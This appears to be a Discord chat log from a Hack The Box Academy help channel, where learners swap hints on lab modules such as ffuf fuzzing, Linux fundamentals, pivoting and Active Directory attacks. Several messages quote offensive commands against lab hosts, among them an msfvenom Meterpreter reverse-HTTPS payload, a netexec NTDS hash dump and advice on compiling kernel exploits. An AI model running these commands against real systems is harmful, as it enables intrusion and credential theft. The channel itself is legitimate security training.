#modules

Sorry* 403

the question is to find a flag of the blog directory however its only returning index and home with php extensions. Not a flag extension

it gives php and phps

does it tell you to use this word list?

could be wrong wordlist or wrong extension (like a .txt file instead of .php)

nah but its on the example

or you are looking in the wrong directory

It said to look in the blog directory

maybe try the medium version of that list

ok one sec

wait, in the command you posted you weren't looking in the blog directory

Hi...i need help for unlock a strong encrypted excel file for my university project...can somebody help with that?

ohh wait

ur right

We can’t help there buddy

this is the blog directory?

blog/ is the blog directory

Where can i get help?

It is, but you’re now only looking for index.<extension>

ahh yes it should be FUZZ.php at the end?

So idk if you’re supposed to look for other files, cus you’re not

facing issues with the box from the first section of ssrf the website is reallllyyy slow

Depends if you need to look for .php files

yes Im looking for other files

yea

php files

You can do /blog/FUZZ and set extension parameter

If only php then yes FUZZ.php should be fine

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://94.237.58.94:43479/blog/FUZZ.phps -ic

this

going crazy again

someone suggested using the -fs option, look up what it does

You stopped filtering for size again

also, not sure if ".phps" is a typo, but it sounded like you needed ".php" a second ago

Not here

Your school maybe?

heres what I got

You have .phps instead of .php

ah yes lemme try again

F

just managed to get the flag

damn that was a pain in the ass

🙂

Make sure to take good notes

thank u and thank u @urban elk

yeah, was about to say. Pause for a second before moving on

and everyone else who helped

yea.. just need to make sure i focus on the pedantics

got a quick question about the virtual box, does anyone know if FTK imager is present within it or is it better loading up my own vm for it?

Can I dm someone about an issue I am having. I'm on Footprinting -Medium Lab and I found the credentials, but RDP is giving me an issue when I try to log in. I've reset the box and tried different usernames with the password and nothing is working.

Put the password in single quotes

should I reset the box again and try it again that way?

Can anyone explain how this is possible? Looking at the github page I still don't understand why an internet connection isn't necessary: https://github.com/TheRook/subbrute

Sure dm

If a name server is available in the internal network, you can specify this. This means that the tool does not need Internet access. It queries the internal NameServer

Oh ok so the local dns server is specified in resolvers.txt?

Yes

I should've gotten that the first time lol 😩 thanks

Hi i need Yelp

Help

Someone hacked my computer and al my accounts even my iPhone

someone must have been really determined to do that

what did you do to someone?

Live

Idk

I Just want to end this

I cant

Do this anymore

cool

Please

Somebody help me

Someone available for a DM regarding Skill Assessment for Advanced SQLi? I really need help with my payloads. Can't seem to ||enter ' or " or $$ in my queries ||

Hi. I can't get an answer right.
I did all the correct steps for the module but the answer is not correct:
Neither the one in the .txt file nor the one that you have to recover in cleartext credentials from .xml file using PS commands.

Can someone give me a nudge?

no. contact your local law enforcement. we cannot help here

Im from latam

They are gonna say reboot your computer

I know you dont care but Im looking for someone who can helps me

have you tried this?

.

havew you tried using findstr ?

I dont know nothing of cybersecurity

I study humanistics

maybe its time to graduate to cybernetics 🤖

Please if you are not going yo help dont be sarcastic its been awfull and stresfull

we cannot help you here -- contact local law enforcement.

Thanks

this channel is for HTB Academy discussion .

Thanks

Factory reset everything

Hello there !

I am block on Linux Fundamentals - Filter Contents part

If someone have some time to spend with me 🙂

yes, contact law enforcement. Or spend a year or two here and learn the tradecraft so you|| can seek revenge yourself || .

just kidding 😁

yes

which question?

The last one

brother what is the last question?

Got it. Thanks.

Oh sorry
This is the question: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

I try to craft something but the number is always wrong. So I suppose, I miss something

grep -oP 'href="https?://www.inlanefreight.com(/[^"]*)"' source.html

okay, so the easiest way i have found to do it. Once we curl the website, look closely and see where exactly ||the occurrences of https://www.inlanefreight.com/ appear. They appear within the src attribute of the script tags, and also the href attribute of the link tags within the page's HTML . Take note of what character appears directly before the domain appears. Then, replace those characters with a new line. Once we get every instance of https://www.inlanefreight.com/ on its own line, its much easier to sort ||.

for example:
||```┌─[eu-academy-2]─[10.10.14.38]─[htb-ac413848@pwnbox-base]─[~]
└──╼ [★]$ curl https://www.inlanefreight.com -s

<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<SNIP>
<script type='text/javascript' src='https://www.inlanefreight.com
/wp-includes/js/wp-embed.min.js?ver=5.6.8' id='wp-embed-js'>
<SNIP>
<link rel="canonical" href="https://www.inlanefreight.com/" />

notice how each domain ||is preceded by either a single quote or double quote? We can pipe the output into tr and replace these characters with a new line. The continue piping into sort, and then into wc|| 🙂

Hum ok, I will try to do something with this.
Thanks for the example !

There's probably a cleaner way to do it with regex, but I am too low IQ for that 😂

Everyone is ahah

I think I am closer, but the number still not good.
I found a lot of occurences (from href, src, ect) but the count is not valid

feel free to DM me

hello , could i get some advice on this , linux fundamentel module task the first + third question :

htb-student@nixfund:~$ netstat -tuln | grep -v '127.0.0.1' | grep '0.0.0.0' | wc -l
16

curl -I https://www.inlanefreight.com | wc -l
8

none of the answers work if i just do the cat /etc/passwd | tr ":" " " | sort | column -t | wc -l
it give 38 eventhough the question is ip4 only just trying to see if something works but teh answers remain the same could i get some advice on how to answers these question

@twin cape

hmm , my mistake , then how should i proceed with the first one

if i do sudo netstat -tuln | grep '0.0.0.0' | wc -l

it gives 0 but then it goes incorrect

we can use netstat -tuln4 to specify ipv4

and then we want results that are NOT localhost

okay , i'll do it a moment

so we could pipe the results into grep -v '127.0.0'

to exclude the loopback IP address

can htb-student use sudo? Make sure you are connected to the target machine with SSH 😉

nope i was within the other tab for the third question : )

netstat -tuln | grep -v '127.0.0' | grep 0.0.0.0 | wc -l

would that be good

it gave 14 this time and said incorrect answer

did you filter for ipv4?

You should be running that in the ssh session idk what all runs by default on pwnbox

we may need to grep for LISTEN as well

yes, they said ip4 only ("How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only) ")

even though we are using -l , the State of the services might not show up as Listening

htb-student@nixfund:~$ netstat -tuln | grep -v '127.0.0' | grep 0.0.0.0 | wc -l
14
htb-student@nixfund:~$ netstat -tuln | grep -v '127.0.0' | wc -l
26

okay , i'll do it

understood

thank you , it worked

htb-student@nixfund:~$ netstat -tulnp4 | grep -v '127.0.0' | grep 'LISTEN' | wc -l
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
7
htb-student@nixfund:~$

nice job 😉

and thank for the advice , ||especially the third question||

you may want to spoiler that

this one

have a good day /night jarednexgent

cheers bro 😉

Jared could i dm , you ||for the third question :
first command ->
curl -s https://www.inlanefreight.com | grep -oP 'https://www.inlanefreight.com\K[^"]*' | sort | uniq
35

second command ->
curl -s https://www.inlanefreight.com | tr -s "'"" "\n" | grep 'https://www.inlanefreight.com' | sort | wc -l
50

none are the answer ||

Hey there looking for a person to hire that can hack a scammer on YouTube, Just for their IP,

#rules you're requesting an illegal service dude

Hey can I get help with Linux fundamentals system information?

What's your actual question?

Hi everyone,

I’m reviewing modules and going through the questions without looking at my notes to reinforce my knowledge, and I’ve come across an issue.

In the module at https://academy.hackthebox.com/module/112/section/1069, when I try to query the FQDN using dig to ACADEMY-FOOT-NIX02, I don’t get any results.
However, if I explicitly query the FQDN with nslookup, I do get a result.

Looking back at the notes I made at the time, I see that the dig query I’m using is the same, but it returns a "refused" response.
Has anyone encountered this before? Any suggestions on what might be going wrong?

Use axfr instead of any

Any is a practically deprecated query

Or NS

transfer failed for axfr
and refused for ns

=/

i don't recall any issues ¯_(ツ)_/¯

Actually wait

Check spelling in your screenshot

:)

inlanegreight.htb

omg

lol

my bad, sorry

https://tenor.com/view/minor-spelling-mistake-thanos-thanos-snap-dust-gif-16037423944121739362

thx, should i delete the question to clean up the chat and avoid this shame ...? ^^

The shame hardens the soul

https://tenor.com/view/the-office-gif-19143688

Yo guys

is this correct?

no

whts wrong?

you're trying to fuzz hostnames and using an ip address instead of the domain

im assuming the ip after "Fuzz"

how can I find the domain name? for example if i didnt have it?

reverse ip lookup, or trying to find a website or some other service that gives it away. this probably isn't the answer you need to continue the module though.

its the question at the end of the section, they've given an example with a dns name but firstly im not sure if that applies to this and secondly if it does, i would like to make sure

it might, who knows. you didn't provide the module or section so its hard to say.

we need to add 'inlanefreight.htb 94.237.63.132' to our hosts file

or whatever the domain is

then in your host header you would do -H 'Host: FUZZ.inlanefreight.htb'

Attacking Web Applications with Ffuf

Filtering Results

ahh ok but how do we know its inlanefreight, for example if no one told me?

I remember using inlanefreight in the previous exercises

its academy.htb

i was just using inlanefreight as an example 😉

ahh mb 😅

sorry didnt read the question proprely 😂

thanks 😄

is there ever a scenario where we are given the ip but not the domain name, if thats the case how will we find the domain name?

usally they will tell you

ahh ok cool, thanks man

the exception is if its a DNS server and a webserver.

Or , it might be a webserver , but when you browse to http://IP:Port , you may get a 302 redirect

to whatever.htb

so in that case, we would add whatever.htb to our hosts file

that way when we try it again , we are able to follow the redirect

sorry wdym by this? 😅

Hey all! I've starting the Pen Tester training path and have a question regarding the "Getting Started" module. Anyone available to offer some insight?

best to just ask your question

Completed the knowledge check challenge yesterday and am going through the walk-through now to see if I missed some other ways to complete the tasks. It mentions passing a found API key to bypass a login page. I've done an initial web search to see how this is done but haven't been able to find anything. Looking for leads on this process.

from the initial nmap scan, there will be some clue as to hostname of the server, and this is usally the subdomain that the DNS server resolves requests for. For example, from fingerprinting the box, we see a reference to dev.inlanefreight.htb

since its a DNS server, we can assume that it resolves requests for the inlanefreight.htb domain

ahh yes I just re read what u said and it makes sense, they also mentioned that redirect has to be added to /etc/hosts file

im asusming if its 3XX?

from here, we would use a tool like subbrute to bruteforce domain names

code 3XX?

and IF the target was also a webserver

more than likely

ahh i havent heard of subbrute

the subdomains would be a vhost

that we could access on the webserver

im still confused on the difference between vhost and subdomain

correct. If you get a redirect to a domain name, i.e. something.htb , you would need to add it to your hosts file

vhost = multiple web applications hosted on the same box . We access them by changing the Host header .

but you can essentially think of a vhost as a subdomain

multiple subdomains of a website, but hosted on the same box

yes and 4XX and 5XX wouldn't be needed (assuming we've added the initial domain to /etc/hosts) as its a client/server error

but BRUTEFORCING subdomains is what we do against a dns server

to see what it has A records for

ahh ok

so we wouldnt do it for Vhosts?

if a single box is both DNS and a web server, most likely some of the subdomains you find from bruteforcing DNS will end up being a vhost

we would brute DNS first, because of the chance of zone transfers

to find even more subdomains

what are zone transfers?

also whats the difference between DNS and web server ? 😅

DNS server will have port 53 open

a web server is any box that is hosting a website

typically on port 80, but alternate ports can be used .

ahh I see

If nmap fingerprints a port as being HTTP, then its a web server

so usually we deal with web servers

in the ffuf module , its exclusively dealing with web servers

and bruteforcing the Host header

to find vhosts

ahhh I see okay

its a bit confusing

yea 😅

but thank you, you helped me understand it better 😊

this box is a decent example:
https://www.youtube.com/watch?v=JRPWFSzFaG0&t=50s

its a DNS server and a web server. By enumerating DNS, he is able to find out the name of vhosts that can be accessed on the web server

thanks ill check it out in a bit

why isnt this working?

i added the ip and domain name to /etc/hosts

port number missing?

i didnt know it needed to be added but still doesnt work

however this works but not with the domain name

cos im tryna find the right param

sounds to me like you didn't add it to the hosts file correctly

also if it's a 10.x.x.x address are you connected to the vpn?

yea im connected to the vpn

i can ping it

you need to add the subdomain/vhost

you didn't add admin.academy.htb

Add the admin.academy.htb to it as well

ahh thank you guys

I thought once we added the main domain it would be okay

port?

you can also put them on one line since they both resolve to the same IP address

http not https, says secure connection failed

ahh didnt know that, thank you

thank you it worked

a zone transfer is when we are able to pull the zone file from a misconfigured DNS server . The zone is basically a config file on the DNS server, once we perfrom the zone transfer we are able to see all the DNS records for the zone .

Once you get to Information Gathering Web Edition it will hopefully make more sense

okay thanks, i appreciate it

I am doing Introduction to Windows Command Line academy module. In Command Prompt Basics Section, I am unable to correctly answer "In what directory can the cmd executable be found? (just the folder name as answer)".
I have ssh into the target and double checked my answer. I don't know what I am doing wrong.

its from the reading

no backslashes 😉

I was trying full path, need to sleep I guess.

i am unable to connect to the windows using xfreerdp. its Introduction to Active Directory module Lab part 1

i also try rdesktop it connect to the machin but it say username or password is incorrect

You need to use the IP from the Click here to spawn the target function above the questions (exercises)

While there is a chance of getting a target matching the IP shown in the section it is a small one

its same IP

Reset the target and try again, if it still doesn't work reach out to support to troubleshoot your VPN connection

also try that more then 5 times, since from last night

then reach out support

ok thank you

There are currently no cloud hacking modules in the Academy

Which module should I tackle first? Web Fuzzing or Attacking Web Applications with Ffuf?

No motivation today

I just wanna...

I believe in you

YOOOO

I completed a module in like less than 10 minutes

This is the first time i have ever completed a module without checking about how to complete it online

Like I understood what it asked me to do and executed it perfectly without major problems

I am proud of myself

great job @hexed matrix

I need help with motivation... I hate staring at wall of text

which module are you on @waxen totem ?

linux fundamentals

I haven't done it, would have thought it to be quite hands-on. What motivates you usually ?

money 😄

that's fair enough hahah. Can't promise a pot of gold at the end of the module, but looking at the bigger picture it's a step in the right direction

I know... it's just so boring though

there will always be something like that, no such thing as a full-on thrill life. Gotta learn to deal with it somehow. I also struggle with it sometimes

but be kind to yourself. Some days are just better than others

Hi friends, I'm sorry if I'm asking a question in the wrong topic, but tell me, can I still somehow play Hack The Boo for beginners or has this event already ended?

I need help with this. I want to use responder with ligolo-ng, in order to retrieve NTLM hashes. Do I need to open ports 137,139,445 and 5355 on the pivot machine? Is there anything else i need to do as well? I set the responder listening to the ligolo's interface

Hack The Boo has ended. next upcoming CTF is the University CTF

You can check this link though: https://github.com/hackthebox/hacktheboo-2024

also contains the challenges

There are practical exercises in every module

Hey anyone finished skill assesment in Attacking wifi protected setup im stuck in last question

What is Wps pin for hack the box corp

Yeh but theres also a bunch of sections without them

@pulsar oak #modules message

Tbh they are quite short mostly

thanks!

not with my attention span 😄 I'd have to re-read a lot of the stuff

You’ll get to do this a lot through academy! 😂

Any clue here ?????

don't understand something after reading it? read it again and get more confused

Try the methods in the section

Ya tired

A few doesnt work

There is one that does

Any small hint

?

There is a method you gotta retrieve a couple of stuff and modify another

I tired to get password and run a script but the script is sorta hanging on me

I modified the script as per said in the module and ran it but it just says two lines and keeps hanging on me
Waiting for beacon
Reveived bescon and nothing more

Then says failed to access essid

And stops any help

Hi,
I'm trying to solve the following question on HTTP Headers question module
The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.

I have access to the flag, I have my dev panel and the requests.
Either I don't understand the question, or there's a problem with the format of my answer. Can anyone help me with this?

Any help

Execute the script as root

Ok

Not working still hangs

?

Now it will probably take some time. Your script has to do its job now. Get yourself a cup of coffee or tea and wait...

Ya but it says

Warning fzilrd to assosiate with the mac address of hackthebox corp

https://github.com/bradmond/reaver-wps/issues/205

guys i'm doing the AEN module but didn't finish it yet and my subscription will end soon will i be able to access the module after the subscription expire ?

No. Only the modules you complete 100% will be accessible after the subscription ends unless you bought it with cubes.

Hi i am having a problem answering the question

Capture the NTDS.dit file and dump the hashes. Use the techniques taught in this section to crack Jennifer Stapleton's password. Submit her clear-text password as the answer. (Format: Case-Sensitive)

of the Password Attacks Attacking Active Directory & NTDS.dit

as i use the command netexec smb 10.129.123.78 -u jmarston -p P@ssword! --ntds
with the credentials i got in the last question and i dont get nothing

I don't remember if you're doing the right thing when it comes to the permissions of the user you are... using, but the tool is just giving you a warning. Either press Y to continue and risk crashing the server, or provide the specific user you are looking for with --user <user>

both dont print me anything

you pass --user with the command

okay i am actualy stupid i wrote the wrong ip

netexec smb <ip> -u jmarston -p P@ssword! --users
Then find the username name of Jennifer Stapleton

yeah i got it thanks 🙂

then netexec smb <ip> -u jmarston -p P@ssword! --ntds --user<name>

ohh 👍👍

Im doing the same module rn

Are you still stuck on this?

I am liking it a lot but i get stuck at some questions 😅

module: Pivoting, Tunneling, and Port Forwarding section: Remote/Reverse Port Forwarding with SSH, I have the answers but I am running through the practical that's given in the text I have followed all the steps I have got up to: ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.9.2 -vN. but it isn't calling back to my listener in meterpreter? should I upload screenshots or is that enough explanation?

this is the bottom of the ssh -R debug log: debug1: Next authentication method: password
ubuntu@10.129.9.2's password:
Authenticated to 10.129.9.2 ([10.129.9.2]:22) using "password".
debug1: Remote connections from 172.16.5.129:8080 forwarded to local address 0.0.0.0:8000
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: filesystem
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: client_input_hostkeys: searching /home/kali/.ssh/known_hosts for 10.129.9.2 / (none)
debug1: client_input_hostkeys: searching /home/kali/.ssh/known_hosts2 for 10.129.9.2 / (none)
debug1: client_input_hostkeys: hostkeys file /home/kali/.ssh/known_hosts2 does not exist
debug1: client_input_hostkeys: host key found matching a different name/address, skipping UserKnownHostsFile update
debug1: pledge: network
debug1: Remote: Forwarding listen address "172.16.5.129" overridden by server GatewayPorts
debug1: remote forward success for: listen 172.16.5.129:8080, connect 0.0.0.0:8000

https://academy.hackthebox.com/module/162/section/1572 Documentation & Reporting Practice Lab

I would like to ask if the exercises in this chapter should begin penetration testing based on the content in Obsidian, or should we start penetration testing from scratch?

I want to some tools for bug bunty hacking

probably better asking in resources for that, theres loads out there

Yes

I don't remember the tier of it, can you send me a screenshot of what you have found, along with what you are trying?

Is there a reason an automatic recursive scan didn't get admin.academy.htb/admin/admin.php

`[INFO] Starting queued job on target: http://admin.academy.htb:37047/admin/FUZZ

[Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 228ms]
| URL | http://admin.academy.htb:37047/admin/.hta
* FUZZ: .hta

[Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 228ms]
| URL | http://admin.academy.htb:37047/admin/.htaccess.php
* FUZZ: .htaccess.php

[Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 234ms]
| URL | http://admin.academy.htb:37047/admin/.htaccess
* FUZZ: .htaccess

[Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 239ms]
| URL | http://admin.academy.htb:37047/admin/.htpasswd
* FUZZ: .htpasswd

[Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 244ms]
| URL | http://admin.academy.htb:37047/admin/.htpasswd.php
* FUZZ: .htpasswd.php

[Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 224ms]
| URL | http://admin.academy.htb:37047/admin/.hta.php
* FUZZ: .hta.php

:: Progress: [9470/9470] :: Job [2/2] :: 165 req/sec :: Duration: [0:01:23] :: Errors: 6688 ::`

But a manual one did.

URL : http://admin.academy.htb:37047/admin/FUZZ 'admin.php [Status: 200, Size: 798, Words: 227, Lines: 54, Duration: 233ms] admin.php [Status: 200, Size: 798, Words: 227, Lines: 54, Duration: 250ms] index.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 250ms] index.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 253ms] :: Progress: [9470/9470] :: Job [1/1] :: 77 req/sec :: Duration: [0:01:05] :: Errors: 1464 ::

Can recursive scans in ffuf not be relied on?

Was admin.php in the wordlist you used?

admin was

And you also didn’t filter the 403’s

If you don’t put an -e parameter with the extensions, it won’t find admin.php

Because admin != admin.php

The command was 'ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:37047/FUZZ -recursion -recursion-depth 1 -v -e .php'

That didn't find admin.academy.htb/admin/admin.php but 'ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:37047/admin/FUZZ -e .php' did

I knew the page was there so the first command of a recursive scan should have got it

Can you try to add -recursion-strategy greedy ? Not sure if that will work though

And can you try adding admin.php to the wordlist?

Maybe it doesn’t properly use the extension with recursion

Like it just started spawning jobs like mad

please paste the output in the appropriate markdown format

if needed trim some of the data

Sometimes it doesn't work

Good morning, can someone help me with the xss and csrf skill assessment, I've already managed to promote myself to moderator but I can't get out of it

I add ' tags

But discord doesn't use them

For multiple lines the triple backticks are used

sigh

I give up

https://support.discord.com/hc/en-us/articles/210298617-Markdown-Text-101-Chat-Formatting-Bold-Italic-Underline#h_01GY0DAKGXDEHE263BCAYEGFJA

' is not `

triple backticks, newline, content, newline, triple backticks
like this

` ` `
text in here(remove space in between backticks)
` ` `

Good morning, can someone help me with the xss and csrf skill assessment, I've already managed to promote myself to moderator but I can't get out of it😄

yes someone can help you

What are directories like .hta and .htapasswd anyway? ffuf and gobuster always find them but they seem like false positives

Cause there's never anything there

🤡

config files

Has anyone completed the Active Directory Trust module? If yes can you please reply to this message I will DM you, I'm stuck in the final assesment question

I send you a message in private

Any hint?

just for a sanity check do all methods work in the Pivoting, Tunneling, and Port Forwarding module? to do a P.O.C as whenever I do the lab examples they don't work which is fine I know how to use ligolo and proxychains but not sure if that'll work going forward. I have found that none of the methods in subsection Choosing The Dig Site & Starting Our Tunnels have worked from start to finish. this could be a me issue but I have ran this by others and tried my VM and pwnbox

What do you mean "all methods?" As in getting errors? Or?

Hello,
On the Windows Attack & Defense skill assessment, I reproduced all the attacks,i have the Administrators hash but I don't know how to access the event logs of the Domain Controller (DC).
Can someone help me ?

hint for what section?

so for example in Remote/Reverse Port Forwarding with SSH
I used the method suggested to follow above and I followed all steps but it wouldn't call back to my metrerpreter listener

That's a you issue, not a method issue

but when I ran it by someone who has also done it they saw nothing wrong? if it is a me issue how do I go about getting help, I can put my terminal extracts in here.?

I don't have access to my vm atm to troubleshoot, but I had no issues with any of the methods

ok but when I ran ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.9.2 it wouldn't call back to my listener even though the msfvenom script was on the ubuntu box it would say connect at the bottom of the debug but my meterpreter would wait on 0.0.0.0:8000

this was the final line in the debug logs?:

debug1: Remote: Forwarding listen address "172.16.5.129" overridden by server GatewayPorts
debug1: remote forward success for: listen 172.16.5.129:8080, connect 0.0.0.0:8000

I'm half way done it

Anyone want to study together? Currently 45% done HTB CPTS

Maybe specify your tun0 address instead of 0.0.0.0

and in the meterpreter also or leave that as 0.0.0.0?

That's fine

its listening and looking but not giving me a meterpreter shell

Ohh then it's fine I needed help for the skill assesment

Why are you using a windows payload for a linux machine?

I also don't recall changing to reverse_https but it's been a minute

because I am trying to pivot to a windows victim machine I already have ssh creds to the pivot box?

Like I said it's been a minute, but is the msfvenom payload also using https?

I can change it to be generic ?

like i said it's been ages ¯_(ツ)_/¯

Make sure there's no spaces as well

yh apologies I am just trying to understand for myself why it isn't working. understanding the tools is why I am doing the module. I know you are normally pretty on it.

Should be LHOST=IP

like this?

msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

Yes

yeah thats what I got, I think it might be a go fish on that one. I really am unsure. if anyone has done it I would be interested to know what I am doing wrong

¯_(ツ)_/¯

no worries thanks anyway, might have to read around on that one

am i the only one facing problems with xfreerdp?

What problems

i use the command to connect with /u: /v: /p: but i keep getting error

nope no problem here

Be more clear

If you don’t provide the error no one can help

no sorry, i was trying to do : /u:Admin but i had to do /u:"Admin" idk why, yesterday i did that /u:Admin and everithing worked fine

Is there anyone who works on file upload attacks skills assessment?

Ok, i have been stuck on this for 2 days, on the "Attacking Common Services -SQL Databases"
For the question 1, what is the password for the 'mssqlsvc' user.
I cant authenticate to the ACADEMY-ATTCOMSVC-WIN-02) with user "htbdbuser" and password "MSSQLAccess01!"

It keeps saying untrusted, or just hanging. I have restarted the machine like 4 times.
Most people have issues getting the password, im having issues getting the initial login so i can start hacking it.

yes there is

Same i am also liking this module , yea the brute-forcing was little bit tiring

I am now brute forcing the Credential Hunting in Linux and i am really stuck

I am also in the same section yet to do the questions
Dm

guys how you compile the exploits i'm trying to compile a kernel exploit on a victim machine but its dosen't have gcc or make and i tried to do it on my machine but didn't work on the victim machine because they are different anyone have a trick because i don't want to install a match vm just to compile

use -static when compiling to compile the needed libraries into the binary, that way your victim machine doesn't need to have the library installed

Hi everyone, is anybody having problems with the Flow Control - Loops exercise in the Introduction to Bash Scripting?

The attacking sql on attacking common services doesnt work.

Thought i made a mistake but this is just straight up broken

Module and Section: Windows Privilege Escalation - Citrix Breakout
Can someone help me here please?
I can't go to: \10.13.38.95\share
Also is being marked as wrong the answer i found at: C:\Users\pmorgan\Downloads.
First question: Submit the user flag from C:\Users\pmorgan\Downloads.

you made a mistake

Attacking Domain Trusts - Child -> Parent Trusts - from Linux
I have gone thru all the steps and made my golden ticket but i just keep getting no writable shares. have reset the server 3 times now and gone thru each time to get the same result. I know im making a mistake somewhere. Just dont know where. any ideas?

tried that when trying to run it i still get "sh: 1: gcc: not found"

I am having a magic moment on the last DNS challenge bruteforcing. I’ve run many dnsenum with multiple lists and no joy. Is there something I am missing or just apply patience?

hello , is this problem a normal occurence of one day a command is working the next it isn't : yesterday { curl -s https://www.inlanefreight.com/ | grep -oP 'https://www.inlanefreight.com[^"]*' | sed 's|https://www.inlanefreight.com||' | sort | uniq | wc -l

35

curl -s https://www.inlanefreight.com/ | grep -oPs 'https://www.inlanefreight.com/K[^"]*' | sort | column -t | wc -l

50
}

today : {
curl -s https://www.inlanefreight.com/ | grep -oP 'https://www.inlanefreight.com[^"]*' | sed 's|https://www.inlanefreight.com||' | sort | uniq | wc -l
/usr/bin/grep: missing terminating ] for character class

}

Hello, does anyone know why I am wrong in the answer to the question: What is the path to the htb-student home directory? pwd response /home/htb-ac-1592938 indicates that it is incorrect, I am on the right track or I am wrong and I continue practicing

Someon can help me in priv plsss

i can't remember what was the question but psexec is not the only way maybe there's another method you can abuse

I guess thats why a bunch of other people are having the same problem.

don't forget to authenticate via SSH to the target

Thank you, I don't know what that is but I know it, thank you, I continue to learn.

Another question, as soon as I started, I have an HP all-in-one computer with 4 RAM and 1 terabay hard drive. It works for me for this course.

Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer. that was the question. researching other ways now

Is it possible if I can get help from someone in dms?

the question gives you a hint for what to do go back and read the section

Doesnt on mine, it was an issue with impacket. I figured it out. Someone else had the same problem and had to fix impacket. I also had to download an alternative to mysql.

Thank you for being useless! 👍

so it wasn’t an issue with the machine?

well gcc should be on your attack host where you can compile stuff, if you get gcc not found then you dont have a compiler installed

i honestly dont really know 100% but i used ctrl-f to find other people having the same issue. They said it wasnt the users fault.

its compile fine but when running it on target machine i get this error

well im saying in this case IT IS THE USERS FAULT

i dont know if its my fault honestly. Its a fresh install of kali and i ran update multiple times. i followed exactly the things that were in the material.

I had to find alternative methods. The course material was inadequate for this particular problem. So call it whatever you want.

i guess its easier to blame the target

I either blame the target, the course material, or mysql and impacket. But i dont have enough information about it, but i know finding an alternative to the course material and mysql was what fixed it.

if there is any error with module content, please submit it to #1234357888114364508

its known as multiple people before me have complained about it

i actually don't think this is a target error though

Im leaning towards the tools

an update might have screwed them up.

so you blame the course material?

first it was the target

it was the target before i solved the issue. then i figured it out and think its the tools

noah you just exposed your skill issue

And i thought course material because using what the course material said didnt work.

I guess lol, it was an uninformed guess at first. Everyone in here has a skill issue, if they didnt they wouldnt be working on a course.

it's almost never the fault of the module content, but rather the tools. it's happened to me, and it's happened to a lot others. so if you are having trouble, i'd look into the tools first

Looking for that endpoint now struggling as well

Sometimes it’s HTB fault, but usually not

Guys what could be the problem if commands that worked some time ago , dont work now

We don’t know what commands ur talking about

Hi guys whats wrong with this command, why is it running so slowly?

Im on the skills assessment for ffuf

you are subdomain fuzzing a ip

I added the domain name to my /etc/hosts file but it was the same problem

you can fuzz a hostname but not a ip

well

you should brush up again on the difference between vhost and dns subdomain fuzzing

if you want to subdomain fuzz like you did there then you need to have a dns server configured that "knows" the subdomain and can tell you if its correct

since you had to add the ip to your hosts file you don't have a dns server to tell you that, which means you probably want to vhost fuzz

and for that you need to fuzz in the host header

okay thanks, but this is the question. it gave us a dns name "academy.htb" and basically says we can use sub domain scan?

subdomain scans work by "asking" a dns server if a certain subdomain exists. Since academy.htb isn't a real domain you can't ask your "standard" dns server like 8.8.8.8, so unless they provide a dns server to you that knows the subdomains you can't use subdomain fuzzing here

vhosts work on the same ip (several "subdomains" on one ip) and the server knows which of the subdomains you tried to access based on the host header in the request. Here you can fuzz different host headers without needing a dns server to tell you if the subdomain exists because the server will respond differently if you have a "hit"

isnt that the case with all htb ips? they are private DNS servers?

on htb you will almost always vhost fuzz instead of subdomain fuzz

ahh ok

but the question is asking for a sub domain name?

yea its still a subdomain name even if you use vhost fuzzing

ahh ok thank you

is this correct?

I'd say dont run it on https but http

okay thanks bro, i think it worked

i got 3, which one should I write in the question 🤔

reading the question it mgiht ask for all 3?

ahh ok yea it did

i had to write all 3 with commas

why isnt test.academy.htb loading?

or the others? 😅

This one

There is a reference in the question

same for all of them

Still specify the port

ahh ok thanks it worked

just fyi, you can specify them all in one line like

94.237.63.132 archive.academy.htb test.academy.htb faculty.academy.htb academy.htb

thanks!

ive left it how it is tho for now 😅

yea thats fine too

ffuf -w /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v

after the "-e" can I specify other web extensions such as php7 and phps or does it only have to be ".php"?

as in can i specify multiple?

-e Comma separated list of extensions. Extends FUZZ keyword.

thanks olli

why is it giving the same number of errors?

you didn't sepcify the port correctly

and I think you are not allowed to use spaces in your -e

it says to keep port as PORT

:thonk:

that makes no sense

idk :/

if you use : after a url you ahve to specify a number as port

no.. you put the actual port there

why is htb telling me that then thats so confusing

the wording is super weird, it has to be a number (thats why you get so many errors ,its a not a valid url)

literally telling me the opposite

idk why it's worded like that

yea bit weird

Hey guys, I've installed Parrot OS HTB version in Virtualbox, connected with the vpn file, but when I try to ssh into the IP it's given me, it tells me the pw is wrong, maybe because I'm not user htb-student?

why dont u copy paste the pasword into it?

same result

how are you trying to ssh into it ? Paste the command

just "ssh ip"

try "ssh user@ip"

@upper haven can u give me some help on this skill assessement, I'm already in the part to explore the sql but I'm not getting it

?

it worked, thnx

Advanced xss and csrf exploitation Skill assessement

u saved me i love you

